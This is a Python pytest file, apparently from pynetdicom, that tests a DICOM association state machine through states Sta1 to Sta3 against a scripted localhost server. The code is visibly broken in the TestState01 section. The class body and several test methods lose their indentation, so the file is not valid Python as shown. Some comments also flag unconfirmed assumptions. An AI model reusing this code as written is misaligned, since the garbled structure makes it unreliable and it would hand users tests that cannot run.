            primitive.calling_presentation_address = ("localhost", 0)
            # The TCP/IP address of the destination, pynetdicom includes port too
            primitive.called_presentation_address = ("localhost", 11112)
            # Proposed presentation contexts
            cx = build_context(Verification)
            cx.context_id = 1
            primitive.presentation_context_definition_list = [cx]

            user_info = []

            item = MaximumLengthNotification()
            item.maximum_length_received = 16382
            user_info.append(item)

            item = ImplementationClassUIDNotification()
            item.implementation_class_uid = "1.2.3.4"
            user_info.append(item)
            primitive.user_information = user_info
        elif assoc_type == "accept":
            primitive.application_context_name = "1.2.3.4.5.6"
            # Calling AE Title is the source DICOM AE title
            primitive.calling_ae_title = "LOCAL_AE_TITLE "
            # Called AE Title is the destination DICOM AE title
            primitive.called_ae_title = "REMOTE_AE_TITLE "
            # The TCP/IP address of the source, pynetdicom includes port too
            primitive.result = 0x00
            primitive.result_source = 0x01
            # Proposed presentation contexts
            cx = build_context(Verification)
            cx.context_id = 1
            primitive.presentation_context_definition_results_list = [cx]

            user_info = []

            item = MaximumLengthNotification()
            item.maximum_length_received = 16383
            user_info.append(item)

            item = ImplementationClassUIDNotification()
            item.implementation_class_uid = "1.2.3.4.5"
            user_info.append(item)
            primitive.user_information = user_info
        elif assoc_type == "reject":
            primitive.result = 0x01
            primitive.result_source = 0x01
            primitive.diagnostic = 0x01

        return primitive

    def get_release(self, is_response=False):
        """Build an A_RELEASE primitive (response if is_response)."""
        primitive = A_RELEASE()
        if is_response:
            primitive.result = "affirmative"

        return primitive

    def get_abort(self, is_ap=False):
        """Build an A_ABORT (or A_P_ABORT if is_ap) primitive."""
        if is_ap:
            primitive = A_P_ABORT()
            primitive.provider_reason = 0x00
        else:
            primitive = A_ABORT()
            primitive.abort_source = 0x00

        return primitive

    def get_pdata(self):
        """Build a P_DATA primitive carrying one PDV from the fixture PDU."""
        item = [1, p_data_tf[10:]]

        primitive = P_DATA()
        primitive.presentation_data_value_list.append(item)

        return primitive

    def monkey_patch(self, fsm):
        """Monkey patch the StateMachine to add testing hooks."""
        # Record all state transitions
        fsm._transitions = []
        fsm.original_transition = fsm.transition

        def transition(state):
            fsm._transitions.append(state)
            fsm.original_transition(state)

        fsm.transition = transition

        # Record all event/state/actions
        fsm._changes = []
        fsm._events = []
        fsm.original_action = fsm.do_action

        def do_action(event):
            fsm._events.append(event)
            if (event, fsm.current_state) in TRANSITION_TABLE:
                action_name = TRANSITION_TABLE[(event, fsm.current_state)]
                fsm._changes.append((fsm.current_state, event, action_name))

            fsm.original_action(event)

        fsm.do_action = do_action

        return fsm

    def start_server(self, commands):
        """Start the receiving server."""
        server = ThreadedParrot(("localhost", 11112), commands)
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()

        return server

    def print_fsm_scp(self, fsm, scp=None):
        """Print out some of the quantities we're interested in."""
        print("Transitions", fsm._transitions)
        print("Changes")
        for change in fsm._changes:
            print("\t{}".format(change))
        print("Events", fsm._events)

        if scp and scp.handlers:
            print("Received", scp.handlers[0].received)
            print("Sent", scp.handlers[0].sent)

    def get_acceptor_assoc(self):
        """Build an acceptor-mode Association connected to the parrot server."""
        # AF_INET: IPv4, SOCK_STREAM: TCP socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO, pack("ll", 1, 0))
        sock.connect(("localhost", 11112))

        ae = AE()
        ae.add_supported_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5

        assoc = Association(ae, mode="acceptor")
        assoc.set_socket(AssociationSocket(assoc, client_socket=sock))

        # Association Acceptor object -> remote AE
        assoc.acceptor.ae_title = "ANY_SCU"
        assoc.acceptor.address = "localhost"
        assoc.acceptor.port = 11112

        # Association Requestor object -> local AE
        assoc.requestor.address = ""
        assoc.requestor.port = 11113
        assoc.requestor.ae_title = ae.ae_title
        assoc.requestor.maximum_length = 16382
        assoc.requestor.implementation_class_uid = ae.implementation_class_uid
        assoc.requestor.implementation_version_name = ae.implementation_version_name

        cx = build_context(Verification)
        cx.context_id = 1
        assoc.acceptor.supported_contexts = [cx]

        fsm = self.monkey_patch(assoc.dul.state_machine)
        return assoc, fsm

    def wait_on_state(self, fsm, state, timeout=5):
        """Poll until the FSM reaches *state* or *timeout* seconds elapse."""
        start = 0
        while fsm.current_state != state and start < timeout:
            time.sleep(0.05)
            start += 0.05
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState01(TestStateBase):
"""Tests for State 01: Idle."""
def move_to_state(self, assoc, scp):
assoc.start()
self.wait_on_state(assoc.dul.state_machine, "Sta1")
def test_evt01(self):
"""Test Sta1 + Evt1."""
# Sta1 + Evt1 -> AE-1 -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
# AE-1: Issue TRANSPORT_CONNECT primitive to <transport service>
commands = [("recv", None), ("send", a_abort), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:1] == ["Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta1 + Evt2."""
# Sta1 + Evt2 -> <ignore> -> Sta1
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta1 + Evt3."""
# Sta1 + Evt3 -> <ignore> -> Sta1
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt3"]
def test_evt04(self):
"""Test Sta1 + Evt4."""
# Sta1 + Evt4 -> <ignore> -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [("send", a_associate_rj), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt4"]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta1 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta1 + Evt6."""
# Sta1 + Evt6 -> <ignore> -> Sta1
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(("localhost", 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ["Evt6"]
def test_evt07(self):
    """Test Sta1 + Evt7."""
    # Sta1 + Evt7 -> <ignore> -> Sta1
    # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
    self.assoc._mode = "acceptor"
    self.assoc.start()
    # Queue the primitive while the FSM is still idle (Sta1)
    self.assoc.dul.send_pdu(self.get_associate("accept"))
    time.sleep(0.5)  # allow the DUL reactor to process the queued primitive
    self.assoc.kill()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[0] == "Evt7"
def test_evt08(self):
    """Test Sta1 + Evt8."""
    # Sta1 + Evt8 -> <ignore> -> Sta1
    # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
    self.assoc._mode = "acceptor"
    self.assoc.start()
    # Queue the primitive while the FSM is still idle (Sta1)
    self.assoc.dul.send_pdu(self.get_associate("reject"))
    time.sleep(0.5)  # allow the DUL reactor to process the queued primitive
    self.assoc.kill()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[0] == "Evt8"
    assert self.fsm.current_state == "Sta1"
def test_evt09(self):
    """Test Sta1 + Evt9."""
    # Sta1 + Evt9 -> <ignore> -> Sta1
    # Evt9: Receive P-DATA primitive from <local user>
    self.assoc._mode = "acceptor"
    self.assoc.start()
    # Queue the primitive while the FSM is still idle (Sta1)
    self.assoc.dul.send_pdu(self.get_pdata())
    time.sleep(0.5)  # allow the DUL reactor to process the queued primitive
    self.assoc.kill()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[0] == "Evt9"
    assert self.fsm.current_state == "Sta1"
def test_evt10(self):
    """Test Sta1 + Evt10."""
    # Sta1 + Evt10 -> <ignore> -> Sta1
    # Evt10: Receive P-DATA-TF PDU from <remote>
    # Scripted server: send a P-DATA-TF, then exit.
    commands = [("send", p_data_tf), ("exit", None)]
    self.scp = scp = self.start_server(commands)
    self.assoc._mode = "acceptor"
    self.move_to_state(self.assoc, scp)
    # Raw-socket connect: avoids queuing a transport event (NOTE: assumed)
    self.assoc.dul.socket.socket.connect(("localhost", 11112))
    self.assoc.dul.socket._is_connected = True
    scp.step()  # run 'send'
    scp.step()  # run 'exit'
    scp.shutdown()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[:1] == ["Evt10"]
def test_evt11(self):
    """Test Sta1 + Evt11."""
    # Sta1 + Evt11 -> <ignore> -> Sta1
    # Evt11: Receive A-RELEASE (rq) primitive from <local user>
    self.assoc._mode = "acceptor"
    self.assoc.start()
    # Queue the primitive while the FSM is still idle (Sta1)
    self.assoc.dul.send_pdu(self.get_release(False))
    time.sleep(0.5)  # allow the DUL reactor to process the queued primitive
    self.assoc.kill()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[0] == "Evt11"
    assert self.fsm.current_state == "Sta1"
def test_evt12(self):
    """Test Sta1 + Evt12."""
    # Sta1 + Evt12 -> <ignore> -> Sta1
    # Evt12: Receive A-RELEASE-RQ PDU from <remote>
    # Scripted server: send an A-RELEASE-RQ, then exit.
    commands = [("send", a_release_rq), ("exit", None)]
    self.scp = scp = self.start_server(commands)
    self.assoc._mode = "acceptor"
    self.move_to_state(self.assoc, scp)
    # Raw-socket connect: avoids queuing a transport event (NOTE: assumed)
    self.assoc.dul.socket.socket.connect(("localhost", 11112))
    self.assoc.dul.socket._is_connected = True
    scp.step()  # run 'send'
    scp.step()  # run 'exit'
    scp.shutdown()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[:1] == ["Evt12"]
def test_evt13(self):
    """Test Sta1 + Evt13."""
    # Sta1 + Evt13 -> <ignore> -> Sta1
    # Evt13: Receive A-RELEASE-RP PDU from <remote>
    # Scripted server: send an A-RELEASE-RP, then exit.
    commands = [("send", a_release_rp), ("exit", None)]
    self.scp = scp = self.start_server(commands)
    self.assoc._mode = "acceptor"
    self.move_to_state(self.assoc, scp)
    # Raw-socket connect: avoids queuing a transport event (NOTE: assumed)
    self.assoc.dul.socket.socket.connect(("localhost", 11112))
    self.assoc.dul.socket._is_connected = True
    scp.step()  # run 'send'
    scp.step()  # run 'exit'
    scp.shutdown()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[:1] == ["Evt13"]
def test_evt14(self):
    """Test Sta1 + Evt14."""
    # Sta1 + Evt14 -> <ignore> -> Sta1
    # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
    self.assoc._mode = "acceptor"
    self.assoc.start()
    # Queue the primitive while the FSM is still idle (Sta1)
    self.assoc.dul.send_pdu(self.get_release(True))
    time.sleep(0.5)  # allow the DUL reactor to process the queued primitive
    self.assoc.kill()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[0] == "Evt14"
    assert self.fsm.current_state == "Sta1"
def test_evt15(self):
    """Test Sta1 + Evt15."""
    # Sta1 + Evt15 -> <ignore> -> Sta1
    # Evt15: Receive A-ABORT (rq) primitive from <local user>
    self.assoc._mode = "acceptor"
    self.assoc.start()
    # Queue the primitive while the FSM is still idle (Sta1)
    self.assoc.dul.send_pdu(self.get_abort(False))
    time.sleep(0.5)  # allow the DUL reactor to process the queued primitive
    self.assoc.kill()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[0] == "Evt15"
    assert self.fsm.current_state == "Sta1"
def test_evt16(self):
    """Test Sta1 + Evt16."""
    # Sta1 + Evt16 -> <ignore> -> Sta1
    # Evt16: Receive A-ABORT PDU from <remote>
    # Scripted server: send an A-ABORT, then exit.
    commands = [("send", a_abort), ("exit", None)]
    self.scp = scp = self.start_server(commands)
    self.assoc._mode = "acceptor"
    self.move_to_state(self.assoc, scp)
    # Raw-socket connect: avoids queuing a transport event (NOTE: assumed)
    self.assoc.dul.socket.socket.connect(("localhost", 11112))
    self.assoc.dul.socket._is_connected = True
    scp.step()  # run 'send'
    scp.step()  # run 'exit'
    scp.shutdown()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[:1] == ["Evt16"]
def test_evt17(self):
    """Test Sta1 + Evt17."""
    # Sta1 + Evt17 -> <ignore> -> Sta1
    # Evt17: Receive TRANSPORT_CLOSED from <transport service>
    # Scripted server: exit immediately, closing the connection.
    commands = [("exit", None)]
    self.scp = scp = self.start_server(commands)
    self.assoc._mode = "acceptor"
    self.move_to_state(self.assoc, scp)
    # Raw-socket connect: avoids queuing a transport event (NOTE: assumed)
    self.assoc.dul.socket.socket.connect(("localhost", 11112))
    self.assoc.dul.socket._is_connected = True
    scp.step()  # run 'exit' -> remote closes the connection
    scp.shutdown()
    time.sleep(0.5)  # give the DUL time to notice the closed transport
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[:1] == ["Evt17"]
def test_evt18(self):
    """Test Sta1 + Evt18."""
    # Sta1 + Evt18 -> <ignore> -> Sta1
    # Evt18: ARTIM timer expired from <local service>
    self.assoc._mode = "acceptor"
    self.assoc.start()
    # Force a quick ARTIM expiry while still idle in Sta1
    self.assoc.dul.artim_timer.timeout = 0.05
    self.assoc.dul.artim_timer.start()
    time.sleep(0.5)  # let the timer expire and the DUL process Evt18
    self.assoc.kill()
    assert self.assoc.dul.artim_timer.expired
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[0] == "Evt18"
    assert self.fsm.current_state == "Sta1"
def test_evt19(self):
    """Test Sta1 + Evt19."""
    # Sta1 + Evt19 -> <ignore> -> Sta1
    # Evt19: Received unrecognised or invalid PDU from <remote>
    # 0x08 is not a valid PDU type, so this triggers Evt19.
    # NOTE(review): this payload is 7 bytes while the Sta2/Sta3 variants
    # use an 8-byte payload — confirm whether the difference is deliberate.
    commands = [("send", b"\x08\x00\x00\x00\x00\x00\x00"), ("exit", None)]
    self.scp = scp = self.start_server(commands)
    self.assoc._mode = "acceptor"
    self.move_to_state(self.assoc, scp)
    # Raw-socket connect: avoids queuing a transport event (NOTE: assumed)
    self.assoc.dul.socket.socket.connect(("localhost", 11112))
    self.assoc.dul.socket._is_connected = True
    scp.step()  # run 'send'
    scp.step()  # run 'exit'
    scp.shutdown()
    # Event recorded but ignored: no transition, no action taken
    assert self.fsm._transitions == []
    assert self.fsm._changes == []
    assert self.fsm._events[:1] == ["Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState02(TestStateBase):
    """Tests for State 02: Connection open, waiting for A-ASSOCIATE-RQ.

    Each test moves an acceptor-mode association into Sta2, injects a
    single event, then checks the transitions/actions/events the FSM
    recorded against the expected behaviour noted in the test comments.
    """

    def move_to_state(self, assoc, scp):
        # Starting the acceptor association triggers Evt5 -> AE-5 -> Sta2
        # (confirmed by the ("Sta1", "Evt5", "AE-5") change in every test)
        assoc.start()
        self.wait_on_state(assoc.dul.state_machine, "Sta2")

    def test_evt01(self):
        """Test Sta2 + Evt1."""
        # Sta2 + Evt1 -> <ignore> -> Sta2
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.shutdown()
        # Only the Sta1 -> Sta2 move happened; Evt1 was recorded but ignored
        assert fsm._transitions[:1] == ["Sta2"]
        assert fsm._changes[:1] == [
            ("Sta1", "Evt5", "AE-5"),
        ]
        assert fsm._events[:2] == ["Evt5", "Evt1"]

    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta2 + Evt2."""
        # Sta2 + Evt2 -> <ignore> -> Sta2
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        pass

    def test_evt03(self):
        """Test Sta2 + Evt3."""
        # Sta2 + Evt3 -> AA-1 -> Sta13
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AA-1: Send A-ABORT PDU, start ARTIM
        commands = [("send", a_associate_ac), ("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta13"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt3", "AA-1")]
        assert fsm._events[:2] == ["Evt5", "Evt3"]

    def test_evt04(self):
        """Test Sta2 + Evt4."""
        # Sta2 + Evt4 -> AA-1 -> Sta13
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AA-1: Send A-ABORT PDU, start ARTIM
        commands = [("send", a_associate_rj), ("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta13"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt4", "AA-1")]
        assert fsm._events[:2] == ["Evt5", "Evt4"]

    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta2 + Evt5."""
        # Sta2 + Evt5 -> <ignore> -> Sta2
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        pass

    def test_evt06a(self):
        """Test Sta2 + Evt6."""
        # Sta2 + Evt6 -> AE-6 -> **Sta3** or Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
        # Valid request -> Sta3
        commands = [("send", a_associate_rq), ("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt6", "AE-6")]
        assert fsm._events[:2] == ["Evt5", "Evt6"]

    def test_evt06b(self):
        """Test Sta2 + Evt6."""
        # Sta2 + Evt6 -> AE-6 -> Sta3 or **Sta13**
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
        # Corrupt bytes 6-7 (protocol version becomes 0x0002) so the
        # request is rejected -> Sta13
        bad_request = a_associate_rq[:6] + b"\x00\x02" + a_associate_rq[8:]
        assert len(bad_request) == len(a_associate_rq)
        commands = [("send", bad_request), ("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta13"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt6", "AE-6")]
        assert fsm._events[:2] == ["Evt5", "Evt6"]

    def test_evt07(self):
        """Test Sta2 + Evt7."""
        # Sta2 + Evt7 -> <ignore> -> Sta2
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        commands = [("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_associate("accept"))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:1] == ["Sta2"]
        assert fsm._changes[:1] == [
            ("Sta1", "Evt5", "AE-5"),
        ]
        assert fsm._events[:2] == ["Evt5", "Evt7"]

    def test_evt08(self):
        """Test Sta2 + Evt8."""
        # Sta2 + Evt8 -> <ignore> -> Sta2
        # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
        commands = [("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_associate("reject"))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:1] == ["Sta2"]
        assert fsm._changes[:1] == [
            ("Sta1", "Evt5", "AE-5"),
        ]
        assert fsm._events[:2] == ["Evt5", "Evt8"]

    def test_evt09(self):
        """Test Sta2 + Evt9."""
        # Sta2 + Evt9 -> <ignore> -> Sta2
        # Evt9: Receive P-DATA primitive from <local user>
        commands = [("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_pdata())
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:1] == ["Sta2"]
        assert fsm._changes[:1] == [
            ("Sta1", "Evt5", "AE-5"),
        ]
        assert fsm._events[:2] == ["Evt5", "Evt9"]

    def test_evt10(self):
        """Test Sta2 + Evt10."""
        # Sta2 + Evt10 -> AA-1 -> Sta13
        # Evt10: Receive P-DATA-TF PDU from <remote>
        # AA-1: Send A-ABORT PDU, start ARTIM
        commands = [("send", p_data_tf), ("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta13"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt10", "AA-1")]
        assert fsm._events[:2] == ["Evt5", "Evt10"]

    def test_evt11(self):
        """Test Sta2 + Evt11."""
        # Sta2 + Evt11 -> <ignore> -> Sta2
        # Evt11: Receive A-RELEASE (rq) primitive from <local user>
        commands = [("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:1] == ["Sta2"]
        assert fsm._changes[:1] == [
            ("Sta1", "Evt5", "AE-5"),
        ]
        assert fsm._events[:2] == ["Evt5", "Evt11"]

    def test_evt12(self):
        """Test Sta2 + Evt12."""
        # Sta2 + Evt12 -> AA-1 -> Sta13
        # Evt12: Receive A-RELEASE-RQ PDU from <remote>
        # AA-1: Send A-ABORT PDU, start ARTIM
        commands = [("send", a_release_rq), ("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta13"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt12", "AA-1")]
        assert fsm._events[:2] == ["Evt5", "Evt12"]

    def test_evt13(self):
        """Test Sta2 + Evt13."""
        # Sta2 + Evt13 -> AA-1 -> Sta13
        # Evt13: Receive A-RELEASE-RP PDU from <remote>
        # AA-1: Send A-ABORT PDU, start ARTIM
        commands = [("send", a_release_rp), ("recv", None), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta13"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt13", "AA-1")]
        assert fsm._events[:2] == ["Evt5", "Evt13"]

    def test_evt14(self):
        """Test Sta2 + Evt14."""
        # Sta2 + Evt14 -> <ignore> -> Sta2
        # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
        commands = [("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_release(True))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:1] == ["Sta2"]
        assert fsm._changes[:1] == [
            ("Sta1", "Evt5", "AE-5"),
        ]
        assert fsm._events[:2] == ["Evt5", "Evt14"]

    def test_evt15(self):
        """Test Sta2 + Evt15."""
        # Sta2 + Evt15 -> <ignore> -> Sta2
        # Evt15: Receive A-ABORT (rq) primitive from <local user>
        commands = [("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_abort())
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:1] == ["Sta2"]
        assert fsm._changes[:1] == [
            ("Sta1", "Evt5", "AE-5"),
        ]
        assert fsm._events[:2] == ["Evt5", "Evt15"]

    def test_evt16(self):
        """Test Sta2 + Evt16."""
        # Sta2 + Evt16 -> AA-2 -> Sta1
        # Evt16: Receive A-ABORT PDU from <remote>
        # AA-2: Stop ARTIM, close connection
        commands = [("send", a_abort), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta1"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt16", "AA-2")]
        assert fsm._events[:2] == ["Evt5", "Evt16"]

    def test_evt17(self):
        """Test Sta2 + Evt17."""
        # Sta2 + Evt17 -> AA-5 -> Sta1
        # Evt17: Receive TRANSPORT_CLOSED from <transport service>
        # AA-5: Stop ARTIM timer
        commands = [("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        time.sleep(0.5)  # give the DUL time to notice the closed transport
        assert fsm._transitions[:2] == ["Sta2", "Sta1"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt17", "AA-5")]
        assert fsm._events[:2] == ["Evt5", "Evt17"]

    def test_evt18(self):
        """Test Sta2 + Evt18."""
        # Sta2 + Evt18 -> AA-2 -> Sta1
        # Evt18: ARTIM timer expired from <local service>
        commands = [("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Force a quick ARTIM expiry while sitting in Sta2
        assoc.dul.artim_timer.timeout = 0.05
        assoc.dul.artim_timer.start()
        time.sleep(0.5)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:1] == ["Sta2"]
        assert fsm._changes[:1] == [
            ("Sta1", "Evt5", "AE-5"),
        ]
        assert fsm._events[:2] == ["Evt5", "Evt18"]

    def test_evt19(self):
        """Test Sta2 + Evt19."""
        # Sta2 + Evt19 -> AA-1 -> Sta13
        # Evt19: Received unrecognised or invalid PDU from <remote>
        # AA-1: Send A-ABORT PDU, start ARTIM
        # 0x08 is not a valid PDU type
        commands = [("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta13"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt19", "AA-1")]
        assert fsm._events[:2] == ["Evt5", "Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState03(TestStateBase):
    """Tests for State 03: Awaiting A-ASSOCIATE (rsp) primitive.

    Each test replaces ``ACSE._negotiate_as_acceptor`` with a stub so the
    state machine stays parked in Sta3 (instead of immediately answering
    the A-ASSOCIATE-RQ), then injects one event and checks the recorded
    transitions, actions and events.
    """

    def move_to_state(self, assoc, scp):
        # Evt5 (Sta1 -> Sta2), then the server's A-ASSOCIATE-RQ gives
        # Evt6 -> AE-6 (Sta2 -> Sta3)
        assoc.start()
        scp.step()
